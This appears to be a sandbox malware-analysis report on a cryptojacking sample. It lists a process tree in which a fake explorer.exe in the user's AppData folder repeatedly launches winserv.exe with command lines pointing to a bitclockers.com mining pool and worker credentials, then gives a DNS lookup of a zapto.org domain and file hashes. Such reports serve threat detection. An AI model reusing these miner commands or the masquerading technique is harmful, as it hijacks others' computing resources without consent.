C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
Files
C:\Users\Admin\AppData\Roaming\explorer.exe
| MD5 | c4ad493a6bfd212c4e1418ba605020af |
| SHA1 | 20272ac81bd1df68603924ae3b1fe4c2df034a29 |
| SHA256 | 492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496 |
| SHA512 | 736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf |